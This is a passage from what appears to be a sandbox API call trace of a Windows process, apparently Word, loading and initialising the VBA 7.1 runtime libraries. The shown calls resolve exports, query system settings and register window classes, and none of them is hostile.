__dllonexit () returned 0xb2a72350000007fe [0041.282] __dllonexit () returned 0xb2a71c80000007fe [0041.283] __dllonexit () returned 0xb2a71cf0000007fe [0041.283] __dllonexit () returned 0xb2a71ccc000007fe [0041.284] DisableThreadLibraryCalls (hLibModule=0x7fee3c90000) returned 1 [0041.284] GetVersion () returned 0x1db10106 [0041.284] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0041.285] GetUserDefaultLCID () returned 0x409 [0041.285] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0041.285] GetSystemMetrics (nIndex=5) returned 1 [0041.285] GetSystemMetrics (nIndex=6) returned 1 [0041.285] GetSystemMetrics (nIndex=11) returned 32 [0041.285] GetSystemMetrics (nIndex=12) returned 32 [0041.285] GetSystemMetrics (nIndex=34) returned 132 [0041.285] GetSystemMetrics (nIndex=35) returned 38 [0041.285] GetSystemMetrics (nIndex=0) returned 1440 [0041.285] GetSystemMetrics (nIndex=1) returned 900 [0041.285] GetSystemMetrics (nIndex=32) returned 4 [0041.285] GetSystemMetrics (nIndex=33) returned 4 [0041.285] GetSystemMetrics (nIndex=4) returned 22 [0041.285] GetSystemMetrics (nIndex=42) returned 0 [0041.285] GetStockObject (i=15) returned 0x188000b [0041.285] GetStockObject (i=7) returned 0x1b00017 [0041.285] GetStockObject (i=6) returned 0x1b00018 [0041.285] GetStockObject (i=8) returned 0x1b00016 [0041.285] GetStockObject (i=4) returned 0x1900011 [0041.285] GetStockObject (i=2) returned 0x1900012 [0041.286] GetStockObject (i=0) returned 0x1900010 [0041.286] GetStockObject (i=5) returned 0x1900015 [0041.286] GetStockObject (i=13) returned 0x18a002e [0041.286] GetDC (hWnd=0x0) returned 0x1d0108c6 [0041.286] GetDeviceCaps (hdc=0x1d0108c6, index=14) returned 1 [0041.286] GetDeviceCaps (hdc=0x1d0108c6, index=12) returned 32 [0041.286] GetDeviceCaps (hdc=0x1d0108c6, index=88) returned 96 [0041.286] GetDeviceCaps (hdc=0x1d0108c6, index=90) returned 96 [0041.286] GetDeviceCaps (hdc=0x1d0108c6, index=38) returned 32409 [0041.286] ReleaseDC (hWnd=0x0, hDC=0x1d0108c6) returned 1 [0041.286] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7fee406ba60 | out: ppMalloc=0x7fee406ba60*=0x7feff045380) returned 0x0 [0043.621] GetModuleHandleA (lpModuleName=0x0) returned 0x13ffb0000 [0043.622] QueryActCtxW (in: dwFlags=0x80000010, hActCtx=0x7fee406a048, pvSubInstance=0x0, ulInfoClass=0x1, pvBuffer=0x206ec0, cbBuffer=0x10, pcbWrittenOrRequired=0x0 | out: pvBuffer=0x206ec0, pcbWrittenOrRequired=0x0) returned 1 [0043.622] ActivateActCtx (in: hActCtx=0x7d88808, lpCookie=0x206eb0 | out: hActCtx=0x7d88808, lpCookie=0x206eb0) returned 1 [0043.622] FindActCtxSectionStringW (in: dwFlags=0x0, lpExtensionGuid=0x0, ulSectionId=0x2, lpStringToFind="Comctl32.dll", ReturnedData=0x206ed0 | out: ReturnedData=0x206ed0) returned 1 [0043.622] LoadLibraryW (lpLibFileName="Comctl32.dll") returned 0x7fefc030000 [0043.623] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000178) returned 1 [0043.623] RegisterClassA (lpWndClass=0x207200) returned 0x100ced03efc199 [0043.629] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c4900000179) returned 1 [0043.630] wcscpy_s (in: _Destination=0x2764fd0, _SizeInWords=0x7, _Source="Common" | out: _Destination="Common") returned 0x0 [0043.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word Documents (*.docm;*.dotm;*.doc;*.dot)", cchWideChar=70, lpMultiByteStr=0x25a2540, cbMultiByte=140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word Documents (*.docm;*.dotm;*.doc;*.dot)", lpUsedDefaultChar=0x0) returned 70 [0043.633] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName="MSI.DLL", phModule=0x7fee4071418 | out: phModule=0x7fee4071418*=0x7fef9a00000) returned 1 [0043.633] GetProcAddress (hModule=0x7fef9a00000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7fef9a83b3c [0043.633] GetProcAddress (hModule=0x7fef9a00000, lpProcName="MsiGetProductCodeA") returned 0x7fef9a7a13c [0043.633] GetProcAddress (hModule=0x7fef9a00000, lpProcName="MsiReinstallFeatureA") returned 0x7fef9a81618 [0043.634] GetProcAddress (hModule=0x7fef9a00000, lpProcName="MsiProvideComponentA") returned 0x7fef9a7f088 [0043.644] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0043.644] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0043.644] lstrcpyW (in: lpString1=0x206f80, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0043.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", cchWideChar=-1, lpMultiByteStr=0x206e70, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", lpUsedDefaultChar=0x0) returned 68 [0043.644] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0044.311] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7fee34b0000 [0044.465] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000017a) returned 1 [0044.465] GetLastError () returned 0x0 [0044.465] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoVBADigSigCallDlg") returned 0x7fee35b72c0 [0044.466] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoVbaInitSecurity") returned 0x7fee35260b0 [0044.466] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFIEPolicyAndVersion") returned 0x7fee34d1a60 [0044.466] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFAnsiCodePageSupportsLCID") returned 0x7fee3525f50 [0044.467] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFInitOffice") returned 0x7fee34cf000 [0044.467] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoUninitOffice") returned 0x7fee34be860 [0044.468] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFGetFontSettings") returned 0x7fee34b3fc0 [0044.468] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoRgchToRgwch") returned 0x7fee34c2380 [0044.468] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoHrSimpleQueryInterface") returned 0x7fee34b7b80 [0044.469] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoHrSimpleQueryInterface2") returned 0x7fee34b7b20 [0044.469] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFCreateControl") returned 0x7fee34b8730 [0044.470] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFLongLoad") returned 0x7fee35f3260 [0044.470] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFLongSave") returned 0x7fee35f3280 [0044.471] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFGetTooltips") returned 0x7fee34c1f40 [0044.471] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFSetTooltips") returned 0x7fee3526370 [0044.471] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFLoadToolbarSet") returned 0x7fee3514590 [0044.472] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFCreateToolbarSet") returned 0x7fee34b55b0 [0044.472] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoHpalOffice") returned 0x7fee34c0240 [0044.473] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFWndProcNeeded") returned 0x7fee34b3d10 [0044.473] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFWndProc") returned 0x7fee34b6d30 [0044.473] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFCreateITFCHwnd") returned 0x7fee34b3d40 [0044.474] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoDestroyITFC") returned 0x7fee34be6f0 [0044.474] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFPitbsFromHwndAndMsg") returned 0x7fee34bdf40 [0044.475] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFGetComponentManager") returned 0x7fee34b7bf0 [0044.475] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoMultiByteToWideChar") returned 0x7fee34bfcd0 [0044.476] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoWideCharToMultiByte") returned 0x7fee34b8b20 [0044.476] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoHrRegisterAll") returned 0x7fee35b2ef0 [0044.476] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFSetComponentManager") returned 0x7fee34c42c0 [0044.477] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFCreateStdComponentManager") returned 0x7fee34b3e20 [0044.477] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFHandledMessageNeeded") returned 0x7fee34bab10 [0044.478] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoPeekMessage") returned 0x7fee34ba7d0 [0044.478] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFCreateIPref") returned 0x7fee34b1550 [0044.478] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoDestroyIPref") returned 0x7fee34be830 [0044.479] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoChsFromLid") returned 0x7fee34b13d0 [0044.479] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoCpgFromChs") returned 0x7fee34b6660 [0044.480] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoSetLocale") returned 0x7fee34b1500 [0044.480] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoFSetHMsoinstOfSdm") returned 0x7fee34b3dd0 [0044.481] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoSetVbaInterfaces") returned 0x7fee35b71e0 [0044.481] GetProcAddress (hModule=0x7fee34b0000, lpProcName="MsoGetControlInstanceId") returned 0x7fee3586d10 [0044.481] GetProcAddress (hModule=0x7fee34b0000, lpProcName="VbeuiFIsEdpEnabled") returned 0x7fee35f98e0 [0044.482] GetProcAddress (hModule=0x7fee34b0000, lpProcName="VbeuiEnterpriseProtect") returned 0x7fee35f9830 [0044.486] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x206f60, nSize=0x118 | out: lpBuffer="\xaf\x01") returned 0x0 [0044.486] SetErrorMode (uMode=0x8001) returned 0x8001 [0044.486] GetModuleFileNameA (in: hModule=0x7fee3c90000, lpFilename=0x206c70, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0044.486] lstrcpyA (in: lpString1=0x206b60, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0044.486] lstrcpyA (in: lpString1=0x206b60, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0044.486] lstrcpyA (in: lpString1=0x206b60, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0044.486] lstrcpyA (in: lpString1=0x206b60, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0044.487] lstrcpyA (in: lpString1=0x206b60, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0044.487] lstrcpyA (in: lpString1=0x206b60, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0044.487] strcpy_s (in: _Dst=0x206d80, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0044.487] _ultoa_s (in: _Val=0x409, _DstBuf=0x2068e0, _Size=0x6, _Radix=10 | out: _DstBuf="1033") returned 0x0 [0044.487] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1033" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033") returned 0x0 [0044.487] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\") returned 0x0 [0044.487] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\", _SizeInBytes=0x104, _Source="VBE7INTL.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0044.488] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 75 [0044.488] CharToOemBuffA (in: lpszSrc="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", lpszDst=0x206790, cchDstLength=0x4c | out: lpszDst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 1 [0044.488] _access_s (_FileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL", _AccessMode=0) returned 0x0 [0044.490] strcpy_s (in: _Dst=0x206a10, _DstSize=0x104, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x0 [0044.490] LoadLibraryA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL") returned 0x7fef89d0000 [0044.494] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000017b) returned 1 [0044.494] GetSystemDefaultLCID () returned 0x409 [0044.494] GetUserDefaultLCID () returned 0x409 [0044.494] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x2070a0, cchData=2 | out: lpLCData=".") returned 2 [0044.494] GetStockObject (i=13) returned 0x18a002e [0044.494] GetObjectA (in: h=0x18a002e, c=60, pv=0x207040 | out: pv=0x207040) returned 60 [0044.494] lstrcpyA (in: lpString1=0x7fee4071b70, lpString2="Vbui6.chm" | out: lpString1="Vbui6.chm") returned="Vbui6.chm" [0044.494] lstrcpyA (in: lpString1=0x7fee4070b40, lpString2="VbLR6.chm" | out: lpString1="VbLR6.chm") returned="VbLR6.chm" [0044.495] GetModuleFileNameA (in: hModule=0x7fee3c90000, lpFilename=0x2070e0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0044.496] lstrlenA (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 66 [0044.496] lstrcpyA (in: lpString1=0x836c4e0, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" [0044.496] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x206f70 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0044.496] GetVersionExA (in: lpVersionInformation=0x206fd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x43, szCSDVersion="") | out: lpVersionInformation=0x206fd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0044.496] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="Licenses", phkResult=0x206ef8 | out: phkResult=0x206ef8*=0x9d6) returned 0x0 [0044.496] strcpy_s (in: _Dst=0x206f00, _DstSize=0x80, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0044.496] strcpy_s (in: _Dst=0x206f80, _DstSize=0xc8, _Src="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Dst="8804558B-B773-11d1-BC3E-0000F87552E7") returned 0x0 [0044.497] _strrev (in: _Str="8804558B-B773-11d1-BC3E-0000F87552E7" | out: _Str="7E25578F0000-E3CB-1d11-377B-B8554088") returned="7E25578F0000-E3CB-1d11-377B-B8554088" [0044.497] RegQueryValueA (in: hKey=0x9d6, lpSubKey="8804558B-B773-11d1-BC3E-0000F87552E7", lpData=0x206f80, lpcbData=0x206ef0 | out: lpData="\x0f}\x02\x01", lpcbData=0x206ef0) returned 0x2 [0044.497] RegCloseKey (hKey=0x9d6) returned 0x0 [0044.497] OleInitialize (pvReserved=0x0) returned 0x1 [0044.497] OaBuildVersion () returned 0x321396 [0044.497] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x7feff380000 [0044.498] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000017c) returned 1 [0044.498] GetLastError () returned 0x0 [0044.499] GetProcAddress (hModule=0x7feff380000, lpProcName="SysFreeString") returned 0x7feff381320 [0044.499] GetProcAddress (hModule=0x7feff380000, lpProcName="LoadTypeLib") returned 0x7feff38f1e0 [0044.500] GetProcAddress (hModule=0x7feff380000, lpProcName="RegisterTypeLib") returned 0x7feff3dcaa0 [0044.500] GetProcAddress (hModule=0x7feff380000, lpProcName="QueryPathOfRegTypeLib") returned 0x7feff411760 [0044.500] GetProcAddress (hModule=0x7feff380000, lpProcName="UnRegisterTypeLib") returned 0x7feff4120d0 [0044.501] GetProcAddress (hModule=0x7feff380000, lpProcName="OleTranslateColor") returned 0x7feff3ac760 [0044.501] GetProcAddress (hModule=0x7feff380000, lpProcName="OleCreateFontIndirect") returned 0x7feff3decd0 [0044.502] GetProcAddress (hModule=0x7feff380000, lpProcName="OleCreatePictureIndirect") returned 0x7feff3de840 [0044.502] GetProcAddress (hModule=0x7feff380000, lpProcName="OleLoadPicture") returned 0x7feff3ef420 [0044.503] GetProcAddress (hModule=0x7feff380000, lpProcName="OleCreatePropertyFrameIndirect") returned 0x7feff3e4ec0 [0044.503] GetProcAddress (hModule=0x7feff380000, lpProcName="OleCreatePropertyFrame") returned 0x7feff3e9350 [0044.503] GetProcAddress (hModule=0x7feff380000, lpProcName="OleIconToCursor") returned 0x7feff3b6e40 [0044.504] GetProcAddress (hModule=0x7feff380000, lpProcName="LoadTypeLibEx") returned 0x7feff38a550 [0044.504] GetProcAddress (hModule=0x7feff380000, lpProcName="OleLoadPictureEx") returned 0x7feff3ef320 [0044.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0044.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0044.504] GetClassInfoA (in: hInstance=0x7fee3c90000, lpClassName="VBBubble", lpWndClass=0x207030 | out: lpWndClass=0x207030) returned 0 [0044.505] RegisterClassA (lpWndClass=0x207030) returned 0x7432eb07fac19b [0044.505] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000017d) returned 1 [0044.505] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Count") returned 0x107630 [0044.505] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="_Default") returned 0x10c26a [0044.505] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Item") returned 0x107ad7 [0044.505] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Add") returned 0x1072f7 [0044.505] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Remove") returned 0x10b1cf [0044.505] GlobalAddAtomA (lpString="VBDisabled") returned 0x7432ec07fac11d [0044.505] RegisterClassExA (param_1=0x207150) returned 0x7432ef07fcc19c [0044.505] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000017e) returned 1 [0044.506] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderMain", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7fee3c90000, lpParam=0x0) returned 0x101fa [0044.507] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016c490000017f) returned 1 [0044.507] GetVersionExA (in: lpVersionInformation=0x206f40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x206f40*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0044.507] GetModuleHandleA (lpModuleName="USER32") returned 0x774e0000 [0044.508] GetProcAddress (hModule=0x774e0000, lpProcName="GetSystemMetrics") returned 0x774f94f0 [0044.508] GetProcAddress (hModule=0x774e0000, lpProcName="MonitorFromWindow") returned 0x774f5f08 [0044.508] GetProcAddress (hModule=0x774e0000, lpProcName="MonitorFromRect") returned 0x774f2b00 [0044.509] GetProcAddress (hModule=0x774e0000, lpProcName="MonitorFromPoint") returned 0x774eab64 [0044.509] GetProcAddress (hModule=0x774e0000, lpProcName="EnumDisplayMonitors") returned 0x774f5c30 [0044.510] GetProcAddress (hModule=0x774e0000, lpProcName="GetMonitorInfoA") returned 0x774ea730 [0044.510] GetProcAddress (hModule=0x774e0000, lpProcName="EnumDisplayDevicesA") returned 0x774ea5b4 [0044.510] MonitorFromWindow (hwnd=0x101fa, dwFlags=0x2) returned 0x10001 [0044.510] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x207150 | out: lpmi=0x207150) returned 1 [0044.510] SetWindowPos (hWnd=0x101fa, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0044.511] GetVersion () returned 0x1db10106 [0044.511] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7feff380000 [0044.511] GetProcAddress (hModule=0x7feff380000, lpProcName="DispCallFunc") returned 0x7feff382270 [0044.512] GetProcAddress (hModule=0x7feff380000, lpProcName="LoadTypeLibEx") returned 0x7feff38a550 [0044.512] GetProcAddress (hModule=0x7feff380000, lpProcName="UnRegisterTypeLib") returned 0x7feff4120d0 [0044.513] GetProcAddress (hModule=0x7feff380000, lpProcName="CreateTypeLib2") returned 0x7feff40dbd0 [0044.513] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDateFromUdate") returned 0x7feff385c90 [0044.514] GetProcAddress (hModule=0x7feff380000, lpProcName="VarUdateFromDate") returned 0x7feff386330 [0044.514] GetProcAddress (hModule=0x7feff380000, lpProcName="GetAltMonthNames") returned 0x7feff3a66c0 [0044.514] GetProcAddress (hModule=0x7feff380000, lpProcName="VarNumFromParseNum") returned 0x7feff384710 [0044.515] GetProcAddress (hModule=0x7feff380000, lpProcName="VarParseNumFromStr") returned 0x7feff3848f0 [0044.515] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecFromR4") returned 0x7feff3bb640 [0044.516] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecFromR8") returned 0x7feff3bb360 [0044.516] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecFromDate") returned 0x7feff3c2640 [0044.516] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecFromI4") returned 0x7feff3a58a0 [0044.517] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDecFromCy") returned 0x7feff3a5820 [0044.518] GetProcAddress (hModule=0x7feff380000, lpProcName="VarR4FromDec") returned 0x7feff3baf20 [0044.518] GetProcAddress (hModule=0x7feff380000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7feff3da0c0 [0044.519] GetProcAddress (hModule=0x7feff380000, lpProcName="GetRecordInfoFromGuids") returned 0x7feff412160 [0044.519] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArrayGetRecordInfo") returned 0x7feff3a5af0 [0044.520] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArraySetRecordInfo") returned 0x7feff3a5a90 [0044.520] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArrayGetIID") returned 0x7feff3a5a60 [0044.521] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArraySetIID") returned 0x7feff3a5a30 [0044.521] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArrayCopyData") returned 0x7feff3860b0 [0044.521] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7feff383e90 [0044.522] GetProcAddress (hModule=0x7feff380000, lpProcName="SafeArrayCreateEx") returned 0x7feff3d9f80 [0044.522] GetProcAddress (hModule=0x7feff380000, lpProcName="VarFormat") returned 0x7feff409b20 [0044.523] GetProcAddress (hModule=0x7feff380000, lpProcName="VarFormatDateTime") returned 0x7feff409aa0 [0044.523] GetProcAddress (hModule=0x7feff380000, lpProcName="VarFormatNumber") returned 0x7feff409990 [0044.523] GetProcAddress (hModule=0x7feff380000, lpProcName="VarFormatPercent") returned 0x7feff409890 [0044.524] GetProcAddress (hModule=0x7feff380000, lpProcName="VarFormatCurrency") returned 0x7feff409770 [0044.524] GetProcAddress (hModule=0x7feff380000, lpProcName="VarWeekdayName") returned 0x7feff3eb8d0 [0044.525] GetProcAddress (hModule=0x7feff380000, lpProcName="VarMonthName") returned 0x7feff3eb800 [0044.525] GetProcAddress (hModule=0x7feff380000, lpProcName="VarAdd") returned 0x7feff4048e0 [0044.526] GetProcAddress (hModule=0x7feff380000, lpProcName="VarAnd") returned 0x7feff409470 [0044.526] GetProcAddress (hModule=0x7feff380000, lpProcName="VarCat") returned 0x7feff4096a0 [0044.526] GetProcAddress (hModule=0x7feff380000, lpProcName="VarDiv") returned 0x7feff402fe0 [0044.527] GetProcAddress (hModule=0x7feff380000, lpProcName="VarEqv") returned 0x7feff409cf0 [0044.527] GetProcAddress (hModule=0x7feff380000, lpProcName="VarIdiv") returned 0x7feff408ff0 [0044.528] GetProcAddress (hModule=0x7feff380000, lpProcName="VarImp") returned 0x7feff409c00 [0044.528] GetProcAddress (hModule=0x7feff380000, lpProcName="VarMod") returned 0x7feff408e60 [0044.528] GetProcAddress (hModule=0x7feff380000, lpProcName="VarMul") returned 0x7feff403690 [0044.529] GetProcAddress (hModule=0x7feff380000, lpProcName="VarOr") returned 0x7feff4092d0 [0044.529] GetProcAddress (hModule=0x7feff380000, lpProcName="VarPow") returned 0x7feff402e80 [0044.530] GetProcAddress (hModule=0x7feff380000, lpProcName="VarSub") returned 0x7feff403f90 [0044.530] GetProcAddress (hModule=0x7feff380000, lpProcName="VarXor") returned 0x7feff4091a0 [0044.531] GetProcAddress (hModule=0x7feff380000, lpProcName="VarAbs") returned 0x7feff3e7c30 [0044.531] GetProcAddress (hModule=0x7feff380000, lpProcName="VarFix") returned 0x7feff3e7a60 [0044.531] GetProcAddress (hModule=0x7feff380000, lpProcName="VarInt") returned 0x7feff3e7890 [0044.532] GetProcAddress (hModule=0x7feff380000, lpProcName="VarNeg") returned 0x7feff3e7ea0 [0044.532] 